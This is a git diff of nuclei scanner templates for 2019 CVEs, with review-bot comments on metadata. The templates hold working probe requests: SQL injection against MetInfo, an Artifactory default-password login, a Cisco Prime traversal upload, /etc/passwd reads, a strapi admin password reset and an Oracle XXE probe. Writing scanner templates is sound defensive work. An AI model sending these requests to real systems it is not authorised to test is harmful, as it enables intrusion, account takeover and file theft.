@@ -1,30 +1,51 @@ id: CVE-2019-17418 + info: - name: MetInfo 7.0 - SQL Injection + name: MetInfo 7.0.0 beta - SQL Injection author: ritikchaddha severity: high - description: An issue was discovered in MetInfo 7.0. There is SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter, a different issue than CVE-2019-16997 + description: | + MetInfo 7.0.0 beta is susceptible to SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter (a different issue than CVE-2019-16997). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Upgrade to a patched version of MetInfo or apply the necessary security patches provided by the vendor. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-17418 - https://github.com/evi1code/Just-for-fun/issues/2 + - https://nvd.nist.gov/vuln/detail/CVE-2019-17418 + - https://github.com/0ps/pocassistdb + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2019-17418 cwe-id: CWE-89 - tags: metinfo,sqli,cve,cve2019 -requests: + epss-score: 0.54908 + epss-percentile: 0.97587 + cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: metinfo + product: metinfo + tags: cve,cve2019,metinfo,sqli + +http: - method: GET path: - "{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin" - redirects: true + + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word part: body words: - "43865094559" + - type: status status: - 200 +# digest: 
490a0046304402205bdf0cc9483e4e894c8475e62e7447fa16b29482cdce267e1e74f1a70076ecc1022010eefa66a62af9489630df3329d9f6ac0ebf0b2b697a4e515aaeb9c8e5f98061:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-17444.yaml b/nuclei-templates/CVE-2019/CVE-2019-17444.yaml deleted file mode 100644 index 14e1fa3426..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-17444.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2019-17444 -info: - name: Jfrog Artifactory <6.17.0 - Default Admin Password - author: pdteam - severity: critical - description: | - Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. - reference: - - https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes - - https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory - - https://nvd.nist.gov/vuln/detail/CVE-2019-17444 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-17444 - cwe-id: CWE-521 - tags: cve,cve2019,jfrog,default-login -requests: - - raw: - - | - POST /ui/api/v1/ui/auth/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json;charset=UTF-8 - X-Requested-With: XMLHttpRequest - Origin: {{RootURL}} - - {"user":"admin","password":"password","type":"login"} - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"name":"admin"' - - '"admin":true' - condition: and - - type: status - status: - - 200 -# Enhanced by mp on 2022/05/16 diff --git a/nuclei-templates/CVE-2019/cve-2019-17506.yaml b/nuclei-templates/CVE-2019/CVE-2019-17506.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-17506.yaml rename to nuclei-templates/CVE-2019/CVE-2019-17506.yaml 
diff --git a/nuclei-templates/CVE-2019/cve-2019-17538.yaml b/nuclei-templates/CVE-2019/CVE-2019-17538.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-17538.yaml rename to nuclei-templates/CVE-2019/CVE-2019-17538.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-17574.yaml b/nuclei-templates/CVE-2019/CVE-2019-17574.yaml index cde4fb25ad..54ec06a2a9 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-17574.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-17574.yaml @@ -1,4 +1,4 @@ -id: 'CVE-2019-17574' +id: CVE-2019-17574 info: name: Popup-Maker < 1.8.12 - Broken Authentication @@ -6,6 +6,8 @@ info: severity: critical description: | An issue was discovered in the Popup Maker plugin before 1.8.13 for WordPress. An unauthenticated attacker can partially control the arguments of the do_action function to invoke certain popmake_ or pum_ methods, as demonstrated by controlling content and delivery of popmake-system-info.txt (aka the "support debug text file"). + impact: | + Unauthenticated attackers can gain administrative access to the WordPress site. remediation: | Update Popup-Maker plugin to version 1.8.12 or later. reference: @@ -19,8 +21,8 @@ info: cvss-score: 9.1 cve-id: 'CVE-2019-17574' cwe-id: CWE-639 - epss-score: 0.12099 - epss-percentile: 0.94812 + epss-score: 0.12974 + epss-percentile: 0.95024 cpe: cpe:2.3:a:code-atlantic:popup_maker:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,7 +31,7 @@ info: product: popup_maker framework: wordpress publicwww-query: "/wp-content/plugins/popup-maker/" - tags: wpscan,cve,cve2019,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass + tags: cve,cve2019,wpscan,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic http: - raw: 
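Review bot: The added impact text, `Unauthenticated attackers can gain administrative access to the WordPress site.`, claims more than the description supports: the description speaks of partial control over `do_action` arguments and of controlling the content and delivery of `popmake-system-info.txt`, and the tags (`disclosure`, `auth-bypass`) and `cwe-id: CWE-639` point the same way, so the impact should be phrased in those terms, e.g. `Unauthenticated attackers can invoke certain popmake_/pum_ actions and obtain the support debug text file.` The first hunk unquotes `id: CVE-2019-17574` but `cve-id: 'CVE-2019-17574'` two hunks later stays quoted, which is inconsistent within the same file. Both points are confined to the visible hunks.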
@@ -56,4 +58,4 @@ http: part: body_2 words: - 'CVE-2019-17574' -# digest: 4a0a004730450221008a465d366930f27fa869121c91bd354aa1a9e0ef932e6d74f4d2049a89c622fd022041e08179506b601e10661cdcaa2428272412dc9d00036a59191d253613581772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201cb7a532725f7804448ffc27f5f766edf3676e258b055224261a99d5047c48880221008ee525f52b9b04dc5b281d401e426a6c3519187ae7fa418713b6b6135c6ddc48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-17662.yaml b/nuclei-templates/CVE-2019/CVE-2019-17662.yaml index 4a2a9f4a33..4c359c861a 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-17662.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-17662.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector. + impact: | + An attacker can bypass authentication and gain unauthorized access to the ThinVNC application. remediation: | Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms. reference: @@ -13,13 +15,14 @@ info: - https://github.com/bewest/thinvnc/issues/5 - https://redteamzone.com/ThinVNC/ - https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py + - https://github.com/YIXINSHUWU/Penetration_Testing_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-17662 cwe-id: CWE-22 - epss-score: 0.52352 - epss-percentile: 0.97249 + epss-score: 0.64941 + epss-percentile: 0.97813 cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:* metadata: verified: true 
@@ -27,7 +30,7 @@ info: vendor: cybelsoft product: thinvnc shodan-query: http.favicon.hash:-1414548363 - tags: packetstorm,cve,cve2019,auth-bypass,thinvnc,intrusive + tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft http: - raw: @@ -52,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100903634bd067df7890afa48c40a00f4b8de49e569615280a3d8bf2548ec940e5c02203d28a1c23252d087c0e6bc52474459493cdfa9f0d4006b2eeb25d2bb3d95d410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202fb82bfb26b97edcb70f493b3640966574b012e563f89c2cdf77953916740bd2022100c643b657ac203096fd96e6dd9cd4a8942c4db7a202addc62e1a0390d913b83e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-1821.yaml b/nuclei-templates/CVE-2019/CVE-2019-1821.yaml deleted file mode 100644 index a7ef6d6f69..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-1821.yaml +++ /dev/null 
@@ -1,50 +0,0 @@ -id: CVE-2019-1821 -info: - name: Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution - author: _0xf4n9x_ - severity: critical - description: Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system. - reference: - - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce - - https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html - - https://nvd.nist.gov/vuln/detail/CVE-2019-1821 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-1821 - cwe-id: CWE-20 - metadata: - shodan-query: http.title:"prime infrastructure" - tags: cve,cve2019,rce,fileupload,unauth,intrusive,cisco -requests: - - raw: - - | - POST /servlet/UploadServlet HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Primary-IP: 127.0.0.1 - Filename: test.tar - Filesize: 10240 - Compressed-Archive: false - Destination-Dir: tftpRoot - Filecount: 1 - Content-Length: 269 - Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83 - - --871a4a346a547cf05cb83f57b9ebcb83 - Content-Disposition: form-data; name="files"; filename="test.tar" - - ../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}} - --871a4a346a547cf05cb83f57b9ebcb83-- - - | - GET /test.txt HTTP/1.1 - Host: {{Host}} - req-condition: true - matchers: - - type: 
dsl - dsl: - - "status_code == 200" - - "contains((body_2), '{{randstr}}')" - condition: and - -# Enhanced by mp on 2022/05/03 diff --git a/nuclei-templates/CVE-2019/CVE-2019-18371.yaml b/nuclei-templates/CVE-2019/CVE-2019-18371.yaml new file mode 100644 index 0000000000..56853b7955 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-18371.yaml @@ -0,0 +1,31 @@ +id: CVE-2019-18371 +info: + name: Xiaomi Mi WiFi R3G Routers - Local file Inclusion + author: ritikchaddha + severity: high + description: | + Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication. + reference: + - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html + - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py + - https://nvd.nist.gov/vuln/detail/CVE-2019-18371 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-18371 + cwe-id: CWE-22 + tags: xiaomi,cve2019,cve,lfi,router,mi,router +requests: + - method: GET + path: + - "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/17 diff --git a/nuclei-templates/CVE-2019/cve-2019-18394.yaml b/nuclei-templates/CVE-2019/CVE-2019-18394.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-18394.yaml rename to nuclei-templates/CVE-2019/CVE-2019-18394.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-18665.yaml b/nuclei-templates/CVE-2019/CVE-2019-18665.yaml new file mode 100644 index 0000000000..36b4018e5a --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-18665.yaml 
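Review bot: The `tags` line of the new CVE-2019-18371 template lists `router` twice (`tags: xiaomi,cve2019,cve,lfi,router,mi,router`); one occurrence should go, and leading with `cve,cve2019` would match the ordering used across the rest of this patch: `tags: cve,cve2019,xiaomi,mi,router,lfi`. The file is also added on the legacy `requests:` schema with no `metadata`/`max-request` block and no `# digest:` trailer, unlike the other templates updated here, so it may be an older copy being synced in rather than a freshly authored template.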
@@ -0,0 +1,30 @@
+id: CVE-2019-18665
+info:
+ name: DOMOS 5.5 - Directory Traversal
+ author: 0x_Akoko
+ severity: high
+ description: |
+ The Log module in SECUDOS DOMOS before 5.6 allows local file inclusion.
+ reference:
+ - https://atomic111.github.io/article/secudos-domos-directory_traversal
+ - https://vuldb.com/?id.144804
+ - https://www.cvedetails.com/cve/CVE-2019-18665
+ - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2019-18665
+ cwe-id: CWE-22
+ tags: cve,cve2019,domos,lfi
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2019/CVE-2019-18818.yaml b/nuclei-templates/CVE-2019/CVE-2019-18818.yaml
deleted file mode 100644
index b379bfbca6..0000000000
--- a/nuclei-templates/CVE-2019/CVE-2019-18818.yaml
+++ /dev/null
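Review bot: The name of the new CVE-2019-18665 template reads `DOMOS 5.5 - Directory Traversal` while its description says the Log module in SECUDOS DOMOS before 5.6 is affected, so the title both understates the affected range and omits the vendor; `name: SECUDOS DOMOS <5.6 - Local File Inclusion` agrees with the description and the `lfi` tag. The secudos.de release note already listed in the references is the fix, which can be stated as `remediation: Upgrade to SECUDOS DOMOS 5.6 or later.` so this file carries the same fields as the templates updated elsewhere in this commit. The matcher and status checks are the same /etc/passwd pattern as CVE-2019-18371 above.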
@@ -1,49 +0,0 @@
-id: CVE-2019-18818
-info:
- name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset
- author: idealphase
- severity: critical
- description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
- reference:
- - https://github.com/advisories/GHSA-6xc2-mj39-q599
- - https://www.exploit-db.com/exploits/50239
- - https://nvd.nist.gov/vuln/detail/CVE-2019-18818
- - https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.5
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2019-18818
- cwe-id: CWE-640
- tags: cve,cve2019,strapi,auth-bypass,intrusive
-requests:
- - raw:
- - |
- POST /admin/auth/reset-password HTTP/1.1
- Host: {{Hostname}}
- Origin: {{BaseURL}}
- Content-Type: application/json
-
- {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "application/json"
- part: header
- - type: word
- condition: and
- words:
- - '"username":'
- - '"email":'
- - '"jwt":'
- part: body
- extractors:
- - type: json
- json:
- - .user.username
- - .user.email
-
-# Enhanced by mp on 2022/05/03
diff --git a/nuclei-templates/CVE-2019/CVE-2019-18957.yaml b/nuclei-templates/CVE-2019/CVE-2019-18957.yaml
index 5fc00dcf02..360420f04c 100644
--- a/nuclei-templates/CVE-2019/CVE-2019-18957.yaml
+++ b/nuclei-templates/CVE-2019/CVE-2019-18957.yaml
@@ -6,19 +6,30 @@ info: severity: medium description: | MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch. reference: - https://seclists.org/bugtraq/2019/Nov/23 - https://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2019-18957 - remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch. + - http://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html + - http://seclists.org/fulldisclosure/2019/Nov/4 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-18957 cwe-id: CWE-79 - tags: cve2019,microstrategy,packetstorm,xss,seclists,cve + epss-score: 0.00375 + epss-percentile: 0.72231 + cpe: cpe:2.3:a:microstrategy:microstrategy_library:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microstrategy + product: microstrategy_library + tags: cve,cve2019,microstrategy,packetstorm,xss,seclists -requests: +http: - method: GET path: - "{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)" 
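Review bot: The relocated `remediation` line on the new side of the first CVE-2019-18957 hunk still says `installing 1.1.3` while the description two lines above says MicroStrategy Library before 11.1.3 is affected, so the fixed version appears mistyped; `remediation: The issue can be resolved by downloading and installing 11.1.3, which has the patch.` would match the description (confirm against the linked advisory before changing it). The added `http://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html` reference duplicates the existing https entry for the same file and differs only in scheme, so one of the two should go. The `info` block and the request continue into the second hunk, which only replaces the trailing comment with the digest.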
@@ -38,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/18 +# digest: 4a0a00473045022048cbc684424ad08cac660728cb7c8e3f5215e29ba815fdc4eff0d7eb372e3266022100e2f803accc5ac089bc651bc89b81d8b0c4e1411fdb6cd1adc5ec2e4479667cd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-1898.yaml b/nuclei-templates/CVE-2019/CVE-2019-1898.yaml index 79b4c34dac..c7493dedb0 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-1898.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-1898.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the router. remediation: | Apply the latest firmware update provided by Cisco to fix the vulnerability. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2019-1898 cwe-id: CWE-425,CWE-285 epss-score: 0.07254 - epss-percentile: 0.93342 + epss-percentile: 0.93384 cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:* metadata: verified: true 
@@ -42,4 +44,4 @@ http: - 'contains(to_lower(body), "ethernet") && contains(to_lower(body), "connection")' - 'contains(header, "application/octet-stream")' condition: and -# digest: 490a0046304402202d820be7cfa91e953acc3f6f1fb6df1585979a3cb1dc1ee9d81b74cae164cefe0220695b6ef51194ec93ec5cf0608a63a11ec0283d8db2a053f01919bf28305250ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022067f8931eeb97e0fbffc1398a800aa506accd3b190b654c90cf98eccafda48444022100d3f77b11e58945d5ba55c13e661a4a09440e9213c8b66cb3c5aca2899f208872:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-1943.yaml b/nuclei-templates/CVE-2019/CVE-2019-1943.yaml index 90d9ffd777..66ae291223 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-1943.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-1943.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the necessary patches or updates provided by Cisco to fix the open redirect vulnerability. reference: @@ -19,7 +21,7 @@ info: cve-id: CVE-2019-1943 cwe-id: CWE-601 epss-score: 0.03526 - epss-percentile: 0.90548 + epss-percentile: 0.90666 cpe: cpe:2.3:o:cisco:sg200-50_firmware:-:*:*:*:*:*:*:* metadata: verified: "true" @@ -28,7 +30,7 @@ info: product: sg200-50_firmware shodan-query: "/config/log_off_page.htm" censys-query: "services.http.response.headers.location: /config/log_off_page.htm" - tags: cve,cve2023,redirect,cisco + tags: cve,cve2019,redirect,cisco http: - raw: 
@@ -51,4 +53,4 @@ http: - type: status status: - 302 -# digest: 490a00463044022036da7769c4a66d3c88f2fedb971af8bbce50925fd97577463b875e68a5d4af1d022076d4d9d4d6cc272de3eb6be123cae186c0aa6732a63630f6951e639c3879a624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b096f24b4e9ce9ef0b364b53f3086ac37d7d62135469943a6d182818d3f7f050022100d2d82add8da52ca9ed1c66110a1d1057e75e1be2a6a9f2081892a8326a73a47b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-20085.yaml b/nuclei-templates/CVE-2019/CVE-2019-20085.yaml index 017846d59d..605d0be619 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-20085.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-20085.yaml @@ -1,22 +1,19 @@ id: CVE-2019-20085 info: - name: TVT NVMS 1000 - Local File Inclusion + name: TVT NVMS 1000 - Directory Traversal author: daffainfo severity: high - description: | - TVT NVMS-1000 devices allow GET /.. local file inclusion attacks. + description: TVT NVMS-1000 devices allow GET /.. Directory Traversal reference: - - https://www.exploit-db.com/exploits/48311 - - https://www.exploit-db.com/exploits/47774 - - http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 + - https://www.exploit-db.com/exploits/48311 + tags: cve,cve2019,iot,lfi classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2019-20085 cwe-id: CWE-22 - tags: cve,cve2019,iot,lfi,kev requests: - method: GET @@ -26,12 +23,9 @@ requests: matchers-condition: and matchers: - type: regex - part: body regex: - "\\[(font|extension|file)s\\]" - + part: body - type: status status: - 200 - -# Enhanced by mp on 2022/06/10 
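Review bot: The two CVE-2019-20085 hunks move the template backwards relative to the rest of this patch: the new side drops the exploit-db 47774 and packetstorm 157196 references, removes the `kev` tag, rewrites `cvss-score: 7.5` as `7.50`, moves `tags` above `classification` and renames the finding to Directory Traversal while keeping the `lfi` tag, whereas CVE-2019-3911 in the same commit goes the other way (`6.10` → `6.1`, epss/cpe/metadata added). The same older shape appears in the CVE-2019-2767 hunk (`7.2` → `7.20`, Oracle advisory reference removed) and the CVE-2019-3929 hunk (`9.8` → `9.80`, Tenable reference removed, `(CVE-2019-3929)` appended to a name that already carries the id). If this "Auto Updated" sync pulled these three files from an older snapshot they are regressions rather than updates and should be taken from the newer side instead. At minimum keep the dropped references and restore `tags: cve,cve2019,iot,lfi,kev` if the CVE is still listed in CISA KEV, since that tag is what tag-filtered runs key on.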
diff --git a/nuclei-templates/CVE-2019/cve-2019-2725.yaml b/nuclei-templates/CVE-2019/CVE-2019-2725.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-2725.yaml rename to nuclei-templates/CVE-2019/CVE-2019-2725.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-2729.yaml b/nuclei-templates/CVE-2019/CVE-2019-2729.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-2729.yaml rename to nuclei-templates/CVE-2019/CVE-2019-2729.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-2767.yaml b/nuclei-templates/CVE-2019/CVE-2019-2767.yaml index 25f208ad14..bf1dcb703f 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-2767.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-2767.yaml @@ -1,4 +1,5 @@ id: CVE-2019-2767 + info: name: Oracle Business Intelligence - Publisher XXE author: madrobot @@ -7,17 +8,18 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - https://www.exploit-db.com/exploits/46729 - - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html + tags: cve,cve2019,oracle,xxe,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-score: 7.20 cve-id: CVE-2019-2767 - tags: cve,cve2019,oracle,xxe,oast + requests: - raw: - | GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1 Host: {{Hostname}} + matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction diff --git a/nuclei-templates/CVE-2019/CVE-2019-3398.yaml b/nuclei-templates/CVE-2019/CVE-2019-3398.yaml index 8c2a0a6616..ddd0b6a263 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-3398.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-3398.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by Atlassian to fix the vulnerability. reference: @@ -19,14 +21,14 @@ info: cvss-score: 8.8 cve-id: CVE-2019-3398 cwe-id: CWE-22 - epss-score: 0.97317 - epss-percentile: 0.99855 + epss-score: 0.97145 + epss-percentile: 0.99783 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: atlassian product: confluence - tags: packetstorm,cve,cve2019,atlassian,confluence,rce,authenticated,intrusive,kev + tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kev variables: num1: "{{rand_int(800000, 999999)}}" num2: "{{rand_int(800000, 999999)}}" @@ -81,4 +83,4 @@ http: - 'ta name="ajs\-draft\-id" content="([0-9]+)">' internal: true part: body -# digest: 490a0046304402203f0a588d6b84ed5fd8d7c6c79d6d940af15b791cac6f32f96b2ddb036ba4cf1d0220214c6399be8dd7a6e0b7e4882789b327e90038537e99da10271db578ffe11240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043ba35e864a4f273e70a587b37a6fa0d0c24dc0d708b756d462b0829909266040220220f314ba326bf955773daff7b02179da1e97126da43b517b8ad8d5e49756d61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2019/CVE-2019-3401.yaml b/nuclei-templates/CVE-2019/CVE-2019-3401.yaml
deleted file mode 100644
index 700ab9bafc..0000000000
--- a/nuclei-templates/CVE-2019/CVE-2019-3401.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2019-3401
-info:
- name: Atlassian JIRA Information Exposure (CVE-2019-3401)
- author: TechbrunchFR,milo2012
- severity: medium
- description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
- reference:
- - https://jira.atlassian.com/browse/JRASERVER-69244
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.3
- cve-id: CVE-2019-3401
- cwe-id: CWE-863
- tags: cve,cve2019,jira,atlassian,exposure
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular"
- matchers:
- - type: word
- words:
- - ''
- - 'Manage Filters - Jira'
- condition: and
-
-# Remediation:
-# Ensure that this permission is restricted to specific groups that require it.
-# You can restrict it in Administration > System > Global Permissions.
